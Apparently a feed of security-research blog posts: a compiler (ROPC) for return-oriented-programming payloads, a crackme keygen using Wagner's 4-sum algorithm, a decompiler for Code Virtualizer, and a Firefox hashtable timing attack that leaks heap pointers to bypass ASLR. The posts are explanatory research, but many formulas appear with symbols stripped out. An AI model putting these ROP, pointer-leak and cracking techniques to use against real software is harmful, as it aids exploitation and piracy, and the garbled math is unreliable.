This is the third (and last) post in a series (first post here, second here) about ROPC, describing implementation of its features like tables, conditional jumps, recursive calls, etc. Please familiarize yourself with the two first posts, otherwise this one might be hard to follow.

After our ROP program finishes executing the **main** function, execution transfers to first address encountered on the stack. This is problematic for few reasons:

- if implementation of function
**F**is present on the stack after the implementation of**main**, then the ROP program will start executing**F**, which contradicts our assumption that the execution starts and ends in**main**, - if the address after implementation of
**main**isn’t mapped in the process’ address space, then our target program terminates with an exception. On the other hand, if the address is mapped, worst case scenario is that we will start executing**format_hard_drive()**function — we can’t predict what is going to happen.

Additionally, for ROP functions to be able to use the emulated stack, variables holding the stack top and the stack frame have to be initialized before entering **main**. The solution is to add an initialization procedure as a preamble to every compiled ROP program. This prologue will:

- initialize variables storing stack top and stack frame,
- copy contents of tables used in the ROP program to the target application’s data section,
- call the
**main**function with the return address set to the very end of the ROP program.

Additionally, we add a special constant **CRASH_ADDR** at the end of the program. **CRASH_ADDR** is picked so that we are sure it’s an address that’s never mapped in the address space. This way the order of ROP functions on the stack doesn’t matter and execution terminates with an access violation while the processor tries to execute code stored under **CRASH_ADDR** — execution stops in a controlled manner.

All table assignments *tab=[1,2,…]* are replaced during AST rewriting with constant assignments *tab=ADDR*, where *ADDR* is the address where the wrapper prologue stored the table’s contents. At first glance this might seem like a waste of space, since we need a procedure in the preamble to store the table (one dword at a time) to a fixed (chosen during compilation) address in the process’ data section. The non-wasteful alternative, storing the table explicitly in the ROP payload requires a gadget that copies the ESP register to another one. It’s necessary because the ROP program doesn’t know its memory location, so in order to reference a table in its body, it needs to know the address of itself. The space wasting variant was chosen for its simplicity :).

All pseudoinstructions (see part 1) related to execution transfers make use of a symbolic constant *FromTo(A,B)*, which is replaced by the byte distance between labels A and B in the compiled payload. Since the distance is signed (*FromTo(A,B)=-FromTo(B,A)*) it follows that *FromTo(A,B)+FromTo(B,C)=FromTo(A,C)*.

The simplest way to implement conditional jumps is the use the **lahf** instruction. lahf copies some flags from the EFLAGS register to the older byte of AX: AH := EFLAGS(SF:ZF:0:AF:0:PF:1:CF). Below is the pseudocode of how ROPC implements a pair of instructions: cmp e1, e2; jXX jmp_lbl.

[compute e1 and store the result in reg1]

[compute e2 and store the result in reg2]

Sub(reg3, reg1, reg2)

SaveFlags ;just lahf

[set EAX=1 if and only if the jump's condition is met]

SetSymbolic(reg4, FromTo('@@', jmp_lbl))

Mul(EAX, EAX, reg4)

OpEsp(Add, EAX)

@@:

Pseudoinstruction (PI) *Sub* is used only to update *EFLAGS*. We can use subtraction instead of comparison on x86 (*cmp* instruction), because *cmp* does the subtraction too, but doesn’t save the result. The key is to ensure that *EAX==1* if and only if the jump’s condition is met — this way multiplication works as a conditional assignment. It’s easy to express boolean conditions when EAX holds flags from EFLAGS.

For recursion to work we need a stack. Since the normal stack (pointed to by ESP) is already used, we need to emulate it using the data section of the targeted process.

We store two variables at the beginning of the data section: current top of the emulated stack and the current stack frame. The prologue of the ROP payload initializes them with the end of the data section (stack growns downwards). During execution of the payload these two variables are modified just like for the native x86 stack.

Below is the implementation of *PushReg(reg)* pseudoinstruction. *ReadMemConst* and *WriteMemConst* take memory address as a constant.

ReadMemConst(reg0, STACK_PTR)

WriteMem(reg0, reg)

ReadMemConst(reg1, STACK_PTR)

Set(reg2, 4)

Sub(reg3, reg1, reg2)

WriteMemConst(STACK_PTR, reg3)

Above pseudocode emulates the native *push* instruction:

- read the stack’s top from STACK_PTR address and store it to reg0,
- store reg’s value to address pointed by reg0,
- read the stack top again (reg0 could be overwritten),
- set reg2=4,
- compute reg3=reg1-reg2=[STACK_PTR]-4,
- update the top of the stack: [STACK_PTR]=[STACK_PTR]-4.

Pseudoinstructions *Pop*, *Leave*, *Enter*, *Ret* and *Call* are implemented in similar fashion.

ROPL code:

` call foo(a1, ..., an)`

after:

is expressed in pseudoinstructions:

` [compute an and store the result in reg]`

PushReg(reg)

...

[compute a1 and store the result in reg]

PushReg(reg)

Set(reg, FromTo(foo, after))

PushReg(reg)

Set(reg, FromTo(after, foo))

OpEsp(Add, reg)

after:

Computed parameters (a1,…,an) are stored on the emulated stack. After them, we store the signed distance between the labels *foo* and *after*. Then we jump to label *foo* — we offset *ESP* by the distance between *after* and *foo*.

After *foo* does its thing it’s time to return to label *after* (just after *OpEsp*). *Ret* pops the “return address” pushed by the *call* and adds to it the distance from itself to label *foo*, getting distance from itself to *after* as a result. Indeed: *FromTo(ret,foo)+FromTo(foo,after)=FromTo(ret,after)*. Knowing this distance, *Ret* can jump back to label *after* and exit the current function :).

ROPC uses the application’s import table for calling OS functions. This solution is simple to implement, but limits the power of expression if the import section contains small number of functions.

In order to call an import, we need to:

- save its parameters on the native stack,
- save the return address on the native stack,
- make sure the import’s local variables don’t overwrite our ROP payload.

The easiest way to fulfill all of the above conditions is to invoke the OS function from application’s data section, instead of the native stack. We copy the import calling stub to the data section and then jump to it. This way we are able to provide the return address (since we know the address of the stub in .data) and don’t need to worry about the import’s local variables.

ROPC is impractical because of the size of code it generates. Attacker’s goal is to take control of the victim’s machine, not to compute Fibonacci numbers ;). Conditional jumps and recursion are not necessary to spawn a shell.

Useful continuation of ROPC would be a tool that can find a sequence of gadgets (as short as possible) able to run a piece of native code given as a parameter. ATM tools that do that (like <em>mona.py</em>) use heuristics and don’t guarantee the semantics of sequences they find.

]]>This is the second post in a series (first post here) describing ROPC. Programs accepted by the compiler are written in ROPL (**R**eturn **O**riented **P**rogramming **L**anguage). ROP programs are usually used as stage 0 payloads. They compute addresses, change memory protections, call few OS APIs. For this reason, language expressing them doesn’t have to be complex.

Grammar for QooL (language accepted by the Q compiler [0]) is shown below.

(exp) ::= LoadMem (exp) (type) | BinOp (op) (exp) (exp) | Const (value) (type) (stmt) ::= StoreMem (exp) (exp) (type) | Assign (var) (exp) | CallExternal (func) (exp list) | Syscall

QooL is simple but sufficient for stage 0 functionality. ROPC has to support conditional jumps and local function invocations, so it’s more complex.

Sample program in ROPL computing first few elements of the Fibonacci sequence:

fun fib(n, out){ x = 0 y = 0 cmp n, 0 je copy cmp n, 1 je copy fib(n-1, @x) fib(n-2, @y) [out] = x+y jmp exit copy: [out] = n exit: } fun main(){ fmt = "%d\n" i = 0 x = 0 print: fib(i, @x) !printf(fmt, x) i = i+1 cmp i, 11 jne print }

Sample above makes use of all of the features of ROPL, like:

- functions,
- function calls,
- native function calls (like invoking printf),
- local variables,
- labels and conditional jumps,
- address operator
*@,* - dereference operator [],
- arithmetic and comparison ops.

**Design considerations**

On “high levelness” scale of languages, we can put ROPL below C but above ASM. Implementation was simplified by few assumptions:

- all variables are unsigned 32 bit numbers,
- reading and writing from/to memory is restricted to 32 bit values (you can’t “natively” write a byte),
- all variables are stored in memory (registers are used as temporary variables, they never store local vars permanently),
- every function is treated as recursive, so local vars are always stored on the emulated stack instead of a constant place in memory.

**Syntax**

You can read the full grammar here. Most important features below.

Arithmetic operators:

- addition,
- subtraction,
- multiplication,
- division,
- negation.

Bitwise operators:

- and,
- or,
- xor,
- not.

Comparison operators:

- equality,
- greater than,
- lower than,
- negations of the three above.

All operators should be treated as their unsigned C equivalents. Function parameters are always passed by value. Since ROPL functions never return anything (in the same sense as void functions in C), it’s necessary to use pointers to get results from procedures. “@” is the “address of” operator. Below is its usage example:

fun foo(x){ [x] = 1 } fun main(){ x = 0 foo(@x) #here x=1 }

foo gets a pointer to x. Dereference operator [] interprets x as a memory address to save a constant. On exit from foo x=1.

**Invoking native functions**

For ROP programs to print their results or influence the OS in interesting ways, they have to be able to call native OS functions. In ROPL native function calls are preceded by an exclamation mark:

fun main(){ x = 0 fmt = "%d\n" !printf(fmt, x) }

Above example will compile only if printf is found in the import table of the target executable.

**Strings**

Strings in ROPL are syntactic sugar. During parsing, instruction “fmt = ‘%d\n'” is going to be replaced with “fmt = [37, 100, 10, 0]” (values in the table are ASCII codes for “%d\n”).

**Fin**

Last post will discuss the actual implementation of ROPL constructs like tables, jumps, recursive calls, emulated stack, etc. Stay tuned

]]>This is a long overdue post describing ROPC (**R**eturn **O**riented **P**rogramming **C**ompiler, available here: https://github.com/pakt/ropc) with its own “higher level” language and features like conditional jumps, loops, functions (even recursive ones), tables, etc.. ROPC was released in 2012. Since then, Christian Heitman made a fork [0] capable of compiling ROP programs expressed in C (!).

Let’s consider a simple example to refresh our understanding of ROP. Below is a short snippet of assembly with few gadgets.

start_rop: ret set_eax: pop eax ret set_ebx: pop ebx ret write_mem: mov [eax], ebx

We want to write value X to address ADDR, using only gadgets we see above. One of possible stack arrangements is:

Address | Value |

ESP+0 | set_ebx |

ESP+4 | X |

ESP+8 | set_eax |

ESP+12 | ADDR |

ESP+16 | write_mem |

Assuming that EIP=start_rop and stack memory is arranged as above, here’s what happens:

- First RET transfers execution to set_ebx
- POP EBX loads X and saves it to EBX
- RET transfers exec. to set_eax
- POP EAX loads ADDR and saves it to EAX
- RET transfers exec. to write_mem
- MOV [EAX], EBX writes X under ADDR
- last RET transfers exec. to undefined address

This was a really simple example, so creating a ROP program was easy, even by hand. Real world exploits are much more complex and in case of large applications (like Firefox) with a large number of gadgets, it’s not clear how to implement the desired functionality “manually”, just by staring at IDA :).

Q [1] was the first tool which did not require any human interaction to compile a ROP program. Before Q, the most advanced was Roemer’s compiler [2], but it did require some level of interaction — gadget database had to be constructed manually.

ROPC is based on Q. Since Q’s code isn’t available, parts of its functionality were implemented from scratch. ROPC searches, classifies and verifies gadgets just like Q. The set of types of gadgets used to express more complex operations is almost the same as in Q. That’s the end of similarities. ROPL (**R**eturn **O**riented **P**rogramming **L**anguage ;)) is higher level and more advanced than QooL. It can express conditional jumps and procedures, even recursive ones.

ROPC also includes some new ideas / solutions:

- compilation based on pseudoinstructions,
- solving technical problems with stack emulation for ROP programs,
- expressing recursive procedures.

ROPC uses two tools:

- BAP
- STP

**BAP** [3] (Binary Analysis Platform) is a framework (written in ocaml) for binary code analysis. BAP first disassembles given code and then converts it to BIL (BAP’s intermediate language). BIL is easier to manipulate than assembly, because:

- it has less instructions,
- side effects (like EFLAGS mutations) are expressed explicitly.

ROPC is using a small subset of BAP’s capabilities:

- lifting from x86 to BIL,
- BIL emulation,
- converting BIL to format digestable by STP.

If you want to do any kind of binary analysis there is a very good chance that BAP already does what you plan to implement. Seriously, use BAP :P.

**STP** [4] is a SMT solver. For our application, it’s just a black box that answer questions about code semantics. BAP provides an API for querying STP (and other solvers) about BIL, so it’s easy to formulate questions about code and get answers from STP. Questions asked by ROPC regard hypotheses about code’s functionality. For example, we might be interested, is it always true that after executing a particular piece of code, the final value in EBX is equal to the starting value of EAX. If STP answers YES, then we can be sure that the analyzed snippet is “semantically equivalent” to MOV EBX, EAX.

Programs generated by ROPC consist of sequence of gadgets. It’s useful to think of them as instructions of very simple assembler.

Table above describes all gadget types recognized by ROPC. denotes assignment of Y to X. is a binary arithmetic or logical operation. [X] denotes 32-bit value in memory cell under address X. Lahf copies processor flags to AH register.

For a given target app (we will call it “host”) we have to first construct a gadget database. This process is described in Q paper, so I won’t repeat it here.

Having the gadget db, compiler can start consuming the ROPL source. From a parsed program in AST (abstract syntax tree) form, there’s a long way to a binary (compiled) result. A simple instruction like: x=a+1 is complex to implement, if all we can operate with are gadgets:

- we need to load r1 register (abstract for now) with the value of local variable a
- set register r2 to 1
- calculate r3 = r1+r2
- write r3 to local variable x

Every read and write from/to a local variable also requires few gadget operations. Since implementations of ROPL instructions in gadgets are long, ROPC uses a higher level construct called pseudoinstructions, or **PI**. PI are “parametrized macros” allowing to express complex operations succinctly. PI can take multiple types of parameters:

- symbolic registers (abstract variable that can be set to any concrete register),
- concrete registers (EAX, EBX, etc),
- numerical constants.

Table above describes a simplified set of PI, used to explain inner working of the compiler. Set used by ROPC is more complex, but the idea is the same. [[R]] means a concrete register assigned to symbolic register R. locals(Var) is the memory address of local variable Var. ReadLocal and WriteLocal implementations were omitted, since they are quite long.

Every ROPL instruction has its implementation in PI. For example, x=a+1 can be implemented as:

ReadLocal(r1, a) Set(r2, 1) Add(r3, r1, r2) WriteLocal(x, r3)

During compilation, ROPC first rewrites instructions from the source to PI sequences and then tries to unroll them into sequences of gadgets by assigning concrete registers to symbolic ones (r1, r2, r3 in the example above). If unrolling suceeds, the sequence of gadgets’ addresses is written to output file as the compiled result.

Compiler consists of three parts:

- candidate generator (CG),
- verifier (VER),
- the actual compiler (COMP).

CG and VER work exactly the same way as in Q, so I won’t repeat the details here. Together, they are able to construct a gadget database with verified semantics. Found gadgets are guaranteed to work exactly as advertised by their type and not crash :). VER additionally provides ROPC with a set of registers modified during gadget execution.

Below are diagrams providing a very high level overview of how components work together.

ROPL source is parsed to produce Abstract Syntax Tree representation of the program. Syntactically correct programs can be semantically incorrect, so we need to run some checks. **AST verification** stage checks if

- variables are initialized before use,
- jumps jump to defined labels,
- all invoked functions are defined,
- function names are unique,
- there is a “main” function,
- functions are called with correct number of arguments.

If a program fails any of the above checks, it’s rejected as invalid and compilation terminates.

**AST simplification** massages the tree to make it easier to process. It’s done by converting complicated expressions to three address code [5]. For example, x=a+b+c is split (simplified) to two instructions: [t=a+b, x=t+c]. After this step, all trees describing arithmetic operating have depth at most 1. Price for this optimizations is increased number of temporary local variables (like ‘t’ in previous example).

**AST rewriting** converts ROPL instructions to sequences of pseudoinstructions. ROPL instruction “cmp” is a good example. To compare arguments, it’s necessary the compute them, save to registers, subtract these registers and then save EFLAGS contents to AH register. PI implementation of “cmp v1,v2” is:

ReadLocal(reg1, v1) ReadLocal(reg2, v2) Sub(reg3, reg1, reg2) SaveFlags

During this stage all instructions are expanded into PI sequences. Next stages operate only on PI lists.

This is the most complex step of the compilation process. To unroll a list of PI to a list of gadgets, it’s necessary to assign concrete x86 registers to all symbolic registers. The problem is, we need to take into account that some assignments will not work, because of gadget side effects (modifying registers) and because not every assignment is possible. We will call an assignment (assignments are functions from symbolic registers to concrete ones) correct, if (and only if) it’s possible (with a particular gadget database) and if it preserves semantics. Here’s an example explaining these two problems:

load_eax: pop eax ret load_ebx: pop ebx mov eax, 0 ret load_ecx: pop ecx ret add1: add eax, ebx ret add2: add eax, ecx ret

Assuming the above is our host app, how do we assign concrete regs to this sequence of PI:

Set(r1, 1) Set(r2, 2) Add(r3, r1, r2)

Assignment [[r1]]=ESI ([[r2]], [[r3]] anything) is not possible, because no gadget is able to set ESI=1. Assignment [[r1]]=EAX, [[r2]]=EBX, [[r3]]=EAX is possible, but does not preserve semantics since load_ebx gadget modifies EAX. Correct (so possible and semantic preserving) assignment is [[r1]]=[[r3]]=EAX, [[r2]]=ECX.

To express these observations more formally, we can say that for every gadget G(r1,..,rn) (r1,..,rn are symbolic) assignment must guarantee that G([[r1]], …, [[rn]]) belongs to a set returned by VER. It must also ensure that if [[r]]=CONCRETE_REG, then CONCRETE_REG isn’t modified between writing and reading r (so it has to be liveness [6] preserving).

Number of possible assignments is exponential, but we can speed up the naive search by observing that there’s no point in checking assignments which do not meet the above criteria (availability and liveness preservation).

Registers available for gadget arguments are provided “for free” by VER. In case of PI, we can use their expansions. Let (this means that expands to ). Then we have . Since r is used as an argument for and it has to belong to “available” sets for both of these PI.

After performing liveness analysis on ROPL source in PI form, for every pseudoinstruction we will get a set of symbolic registers which are “live” during its execution. These sets provide two important pieces of information: which registers can’t be modified and which registers can’t share a concrete register.

Set of registers modified during gadget execution (as a side effect) is provided by CG and verified by VER, so we can be sure about its correctness.

Having information about possible assignments, liveness and assignment conflicts, we can generate all legal assignments and check them one by one, until we find the one which can be fulfilled using the gadget database.

Implementation of jumps is based on modifying ESP by a constant equal to the distance between the jump instruction and target label: ESP += C. This constant isn’t known until all PI are expanded to a sequence of gadgets. Only then, by summing their sizes (how much space they take on the stack) we can calculate the needed offset.

Concretization is the last stage before producing the final ROP payload. The only thing that changes during this stage is the SetSymbolic(reg, S) pseudoinstruction, where reg is a concrete register and S is a symbolic constant expressing the distance between two labels. After computing S (S=X), SetSymbolic(reg, S) changes to Set(reg, C).

I hope this post was useful. Please post any questions in the comments. Next part will discuss ROPL syntax and capabilities :).

0 – https://github.com/programa-stic/ropc-llvm

1 – http://users.ece.cmu.edu/~ejschwar/papers/usenix11.pdf

2 – http://cseweb.ucsd.edu/~hovav/dist/rop.pdf

4 – https://sites.google.com/site/stpfastprover/

]]>

To see that, let , where is the probability of encountering at least one pair of equal birthdays in a group of people. is the probability that in a group of , birthdays are pairwise different. Assuming there are 365 days in a year, — first person is free to have any birthday, the second one can pick any day from the remaining 364. By generalizing this reasoning, we arrive at: , for (for , ).

Above graph shows how quickly rises.

If we replace birthdays with values of a hash function , birthday paradox provides a way to find collisions for . Algorithm is quite simple:

**CHECK-IF-COLLISION-EXISTS(k, H):**

- , ,
- pick random (without repetition) and compute ,
- if , return
*YES*, - ,
- ,
- if goto 1, else return
*PROBABLY NOT*.

Algorithm runs in , but this isn’t really useful — we want complexity to be parametrized by probability of finding a collision. Formula for isn’t easily invertible, so we need to approximate it by something simpler. One easy to derive approximation is (see [0]), so .

We can extend this reasoning and conclude that if there are “days” and persons, then the probability that there are at least two of them with the same birthday is . Now, if we assume that , where is equal to the size of image of our hash function, then by inverting the formula for (see [1]), we get , where is the desired probability of collision. For , . This approximation shows that for (for example) MD5, CHECK-IF-COLLISION-EXISTS would loop around times (MD5 hashes are 128 bits long) and return YES with probability 0.5.

There are multiple generalizations of this problem, but we are interested in a result of David Wagner from 2002 [2]. Citing from the paper’s abstract:

*“We study a k-dimensional generalization of the birthday problem: given k lists of n-bit values, find some way to choose one element from each list so that the resulting k values xor to zero. For k = 2, this is just the extremely well-known birthday problem, which has a square-root time algorithm (…). In this paper, we show new algorithms for the case k > 2: we show a cube-root time algorithm for the case of k = 4 lists (…).”*

For details, see the paper [2]. Key observations from our point of view are:

- algorithm for k=4 runs in cube-root time,
- xor can be replaced by addition modulo a power of 2.

Armed with this knowledge, we can take a look at the problem from KeygenMe3 by Dcoder [5].

Here’s a high-level pseudocode of the protection scheme:

sum = 0 name_hash = hash(name) for i in 0..15: x = (i<<8) | serial[i] sn_hash = hash(x) sum += sn_hash if(sum == name_hash) good else bad

Hash function used is SipHash [3], which is a lightweight PRF (pseudorandom function).

You might recognize the problem stated by Dcoder as the subset sum problem (SUM) [4]. SUM is NP-complete and it’s unknown if there is a polynomial time algorithm that solves it exactly. The best exact general-case algorithm has complexity , where n is the size of the set we can pick numbers from. In our case , which makes prohibitively large.

There’s a probabilistic algorithm (described in [2]) that solves SUM in time, where is equal to the bit size of numbers used. In our case bits, so . The algorithm takes 4 lists of numbers: , , , and returns a set of tuples , where . The only requirement is that we can ‘extend’ all lists freely. All details are clearly explained in [2], so I won’t repeat them here.

At first sight, there are few problems:

- we have 16 lists of numbers, instead of 4 (there are 16 bytes in a serial),
- each of our 16 lists contains exactly 256 numbers (each one of 16 positions can take one of 256 possible values),
- the target sum is (almost always) nonzero.

We can deal with 1 and 2 by observing that instead of working with 16 lists, we can work with 4 lists containing random 4-element sums, so will contain 4-sums of elements from , , , , 4-sums of elements from , , , , etc. Solving SUM for , .., , solves it for , .., , because if and , then , where .

Problem 3 is easily dealt with by observing that subtracting a constant from all elements of a single list is equivalent to solving SUM for nonzero sum. Indeed: implies . Here, is the target sum subtracted from list number 4.

Keygen sources are available here. 4sum.py is an easy to read implementation of the original algorithm from [2]. sum4.c is the actual keygen source. Should compile without any warnings with ‘make’.

0 – http://en.wikipedia.org/wiki/Birthday_problem

1 – http://en.wikipedia.org/wiki/Birthday_attack

2 – http://www.cs.berkeley.edu/~daw/papers/genbday-long.ps

3 – https://131002.net/siphash/

4 – http://en.wikipedia.org/wiki/Subset_sum_problem

5 – http://crackmes.us/read.py?id=611

*Code Virtualizer is a powerful code-obfuscation system that helps developers protect their sensitive code areas against Reverse Engineering while requiring minimum system resources.*

*Code Virtualizer can generate multiple types of virtual machines with a different instruction set for each one. This means that a specific block of Intel x86 instructions can be converted into different instruction set for each* *machine, preventing an attacker from recognizing any generated virtual opcode after the transformation from x86 instructions.*

This post describes DeCV — a decompiler for Code Virtualizer.

This is a high-level description. For a detailed discussion of CV internals see “Inside Code Virtualizer” by scherzo [6].

CV obfuscates the original x86 code by translating it to a custom stack oriented language [1]. CVL (CV’s language) has around 150 instructions but a lot of them are byte/word/dword variants of the same operation.

For example, consider this simple x86 code:

xor eax, 1111h

Its equivalent in CVL is:

load ptr eax

store addr

load dword [addr]

load dword 0x1111L

xor dword

store dword eflags

load ptr eax

store addr

store dword [addr]

To emulate x86 registers, CVL uses a table. Each dword in this table corresponds to one x86 register, so ‘*load ptr <reg>*‘ places a pointer to a variable holding <reg’s> value on the stack.

‘*store addr*‘ pops a value from the stack and places in a ‘built in’ variable called ‘addr’.

‘*load dword [addr]*‘ pushes a dword pointed by ‘addr’ on the stack.

The cumulative effect of the three instructions above is to push the value of eax on the stack.

Let’s emulate the rest of the code:

Instruction | Stack ---------------------------- load dword 0x1111 | eax xor dword | eax, 0x1111 store dword eflags | eax ^ 0x1111, new_flags load ptr eax | eax ^ 0x1111 store addr | eax ^ 0x1111, ptr eax store dword [addr] | eax ^ 0x1111 -- | -

Notice that ‘xor’ pushes two values on the stack: the xor’s result and the new value of EFLAGS register.

In order to recover the original x86 code, it’s sufficient to emulate CVL’s execution using symbolic registers instead of concrete values and emit x86 assembly on instructions like ‘store dword [addr]’. For example, if ‘addr’ equals ‘eax’ and there is ‘eax XOR ebx’ on top of the stack, the instruction to emit is ‘xor eax, ebx’. This is tree munching is disguise btw [2].

DeCV does not implement full x86 recovery. I included an example of how this should be implemented, if anyone is interested — recover_x86.py reads a short CVL snippet and translates it back to assembly using the method described above.

CVL -> x86 translation is the easiest part of the CV puzzle, the real problem is to extract the CVL given just an obfuscated binary.

Each protected binary contains a virtual machine capable of executing a CVL program ‘compiled’ to bytecode. The interpreter doesn’t differ from other virtual machines:

dispatch: ;(deobfuscated and simplified version)

lodsb

movzx eax, al

jmp dword ptr [edi+eax*4]

‘esi’ points to the bytecode, ‘edi’ points to a table of handlers for different virtual instructions. For example, the ‘load ptr <reg>’ instruction is implemented as:

lodsb

movzx eax, al

lea eax, [edi+eax*4]

push eax

Byte pointed by ‘esi’ is the register’s offset in the register structure pointed by ‘edi’.

The decompilation process seems obvious — just take the bytecode, analyze which handlers are executed, get the CVL and then translate it back to x86. This indeed works, assuming we can tell which handlers implement which CVL instructions. There are two problems:

– all handlers are obfuscated to the point where it’s not possible to identify their semantics,

– handlers’ parameters and the bytecode itself are encrypted with a dynamic key (ebx), so even after all handlers are identified, their parameters are still unknown.

In order to deobfuscate handlers, DeCV performs a set of compiler optimizations on them, like constant propagation and folding, dead code elimination, peephole optimizations, etc. When the handler’s implementation stops changing (a fixpoint is reached), we can compare it to a set of original handlers extracted from the CV protector binary. Finding a match is equivalent to identifying the CVL instruction implemented by a handler. This is the same method as described in [3]. In [4] Rolf applies compiler opts during a different stage (CVL->x86).

There’s one problem with this approach that isn’t mentioned anywhere — CV can obfuscate the handlers’ control flow, by inserting random conditional jumps in its body. Fortunately, this obfuscation isn’t very complex — there’s only one correct path through the handler and it doesn’t change between executions. This means that the conditions tested during branching do not depend on variables, but on constants (in other words, they evaluate to constants). It should be possible to simply emulate all code up to the branch point to decide which path should be taken. It turns out it’s not that simple. Consider this code:

xor eax, ebx

xor ebx, eax

xor eax, ebx

or the xor-swap trick. The above sequence is equivalent to ‘xchg eax, ebx’.

My first attempt at emulation was to have three types of values: symbolic registers, concrete constants and unknowns. The above sequence is problematic, because if eax=const, ebx=unknown, then eax turns into an unknown after the first xor and there’s no way to recover it. Notice that we can’t just set all registers to concrete values at the beginning, because then we would miss real conditional jumps (there are handlers that have ‘real’ branches in them) and we need to identify branches that really do depend conditionally on input.

DeCV solves this problem by applying optimizations to code before a branch and then emulating the result. This way all nasty corner cases like the swap trick are removed and it’s possible to compute the conditions (by simple emulation) and decide jumps. After all fake branches are removed, the deobfuscation process can proceed like in the branchless case. Note that only a single path in the control flow graph should be followed — it’s not necessary to deobfuscate all of the CFG nodes.

With all handlers deobfuscated it’s easy to extract their parameter decryption procedures. Every handler that requires a parameter decrypts it using a unique function consisting of a combination of add/sub/xor instructions. After collecting all of these decryption functions it’s possible to decrypt the whole CVL program and all parameters used by handlers. Having all of this information is equal to decompiling the obfuscated CVL program.

DeCV will automatically perform all tasks including:

– locating the handlers table,

– locating the main dispatcher,

– collecting the handlers’ bodies split with unconditional jumps.

The decompilation takes few seconds max., depending on how complicated the VM is. The output is printed in IDA’s output window. DeCV was tested with IDA 6.2 and IDAPython 1.5.3. Example output:

vms found: 1

0x40740e

vm: 0

0x00000000 000[07] load ptr eflags

0x00000002 001 store addr

0x00000003 018 store dword [addr]

(…)

0x40740e is the VM’s entry point. First column is the instructions offset (in bytecode), second is the handler’s id (see clean_handlers dir), values in brackets (like [07]) are parameters.

DeCV was well tested on small, synthetic binaries protected with Code Virtualizer 1.3.8.

There are some bugs in IDA that might require manual intervention during the deobfuscation process — see the README.

Sources on github. Typical decompilation output on pastebin.

**References**

1. http://en.wikipedia.org/wiki/Stack-oriented_programming_language

2. http://www.eng.utah.edu/~cs5470/schedule/Lec21.pdf

3. http://www.woodmann.com/forum/entry.php?115-Fighting-Oreans-VM-(code-virtualizer-flavour)

4. http://static.usenix.org/event/woot09/tech/full_papers/rolles.pdf

5. http://oreans.com/codevirtualizer.php

6. http://tuts4you.com/download.php?view.2640

Consider a hash table using double hashing [1]. Checking if a key belongs to a hash table T can be expressed as:

def lookup(T, k): h1 = hash1(k) h2 = hash2(k) idx = h1 while 1: if is_free(T[idx]): return False #structure holding (k,v) s = T[idx] if s.k == k: return True idx += h2 idx = idx % size(T)

Note this can’t loop if always returns something relatively prime to and is never 100% full (FF keeps both of these conditions true).

Firefox is nice enough to store certain kind of pointers and user supplied integers in the same hash table. All of the magic happens in this function:

file: js\src\jsscope.cpp function: Shape ** PropertyTable::search(jsid id, bool adding)

is an abbreviation of T.search(k, false).

In order to layout keys in as described in part 1:

we set properties of a javascript object. JS code:

obj[x] = 1;

translates to and if is an integer, we have full control on where exactly in it’s going to be stored. The hash functions used by FF are (all operations modulo ):

def h(x): return x*GOLDEN def hash1(x, shift): return h(x)>>shift def hash2(x, log2, shift): return (h(x)<<log2)>>shift

where is an odd constant (golden ratio), , = .

In order to set , we need to find s.t. = . Since is relatively prime to , it has a multiplicative inverse [2] . Solving for yields . Now the factor would be if integers passed from JS were not mangled, but unfortunately they are — instead of , the key being added to the table is (this is related to how FF tags [3] pointers). To accomodate for this, set and let

Now **obj[x’]=1;** will result in setting at position , but that equals

The equality holds, because if , must be odd (since both and are odd).

Using these formulas, we fill (mixing python and js pseudocode):

obj = {} for i in range(N): x' = calc_x(i) obj[x'] = 1 #this results in T[i] being set

How to use this crafted table to leak information?

Invoking **obj.hasOwnProperty(str)** is equivalent to , so if we make enough JS objects (strings in this POC) we will eventually find one that takes considerably longer to check than others. Let’s call this object . Recall that running time of is proportional to the length of ‘s chain, so longer checking means longer chain.

Using the technique described in part 1, we can learn elements belonging to ‘s chain. Let’s express them as (, ).

Part 1 describes how to recover with high probability, by computing the of a specific set. We will prove that the “exponentially low probability for failure” claim is correct and discuss a case where the described algorithm can fail.

Let and let . is a set of differences of randomly chosen elements from . Let (note that ). What’s the probability that ?

An equivalent question is to ask about probability of for . To see that, consider what happens if we divide all elements of by , or multiply all elements of by .

Nymann asked himself the same exact question in 1972 and proved [5], that the probability of random integers being relatively prime is , where is the Riemann’s zeta function [6]. I think it’s pretty cool that zeta made its way to a blog post about hashtables in Firefox :D. Yet another grave reason to solve the related millenium problem [8] ;).

It’s easy to see that exponenets work in our favor. Since , then , so and . Probability that approaches exponentially fast in terms of .

The above reasoning works when the sequence of elements of ‘s chain is monotonic, meaning that was small enough to never “wrap” around . There’s a second case, which looks like this, when plotted on a graph:

Elements are scattered around both ends of the filled region. This happens when is big enough to “jump over” the free region at the end of the hashtable.

The in that case is most likely going to be equal to 1, but with . There’s a fast way to deal with this problem.

Let , so that we can express differences of elements of ‘s chain as:

mod

.

.

mod

Notice that the range of is . Low end with , and high end with ,.

Knowing that, we can iterate over all possible values of , solve the equation for (using the linear congruence theorem [7]) and then compute:

mod

.

.

mod

If we found was correct, then . Probability that this condition is true, but is incorrect is (again) exponentially low.

Part 1 discusses how to find the chain’s starting point , knowing a single element of the chain and its period .

Having and , we reconstruct ptr(Mstr) exactly:

As we can see, leaking information is not the same thing as reading memory. My proposition is to define “leaking” as any procedure leading to diminishing the number of possible states the attacked program might be in. Let’s say a program has 2 bits of memory. Let’s assume we learned (by any means) that xor ( is the memory). This condition allows only , or ,, so the number of possible states is 2, instead of 4. “Memory disclosure” definition fails to account for these “partial” leaks and side channel leaks, while the “entropy” one doesn’t.

**References**

1. http://en.wikipedia.org/wiki/Double_hashing

2. http://en.wikipedia.org/wiki/Modular_multiplicative_inverse

3. http://en.wikipedia.org/wiki/Tagged_pointer

4. http://en.wikipedia.org/wiki/Linear_regression

5. J. E. Nymann. “On the Probability that k Positive Integers Are Relatively Prime.” J. Number

Theory 4 (1972):469-73.

6. http://en.wikipedia.org/wiki/Riemann_zeta_function

7. http://en.wikipedia.org/wiki/Linear_congruence_theorem

8. http://en.wikipedia.org/wiki/Millennium_Prize_Problems#The_Riemann_hypothesis

It turns out these attacks can be applied in a more prosaic context — instead of encryption keys, they can help us leak pointers to objects on the heap or, if we are lucky, in .code/.data sections of targeted application. Leaking a pointer with fixed RVA reveals the imagebase, so ASLR becomes ineffective (ROP). Leaking a heap pointer makes expoitation of WRITE-ANYWHERE bugs easier, so in both cases it’s a win :).

This post provides a high-level description of a POC implementation of a timing attack on hashtable used in Firefox (tested on v4, v13, v14). POC is quite fast (takes few secs) and leaks a heap pointer to a JS object. A detailed explanation will be provided in a different post (part 2).

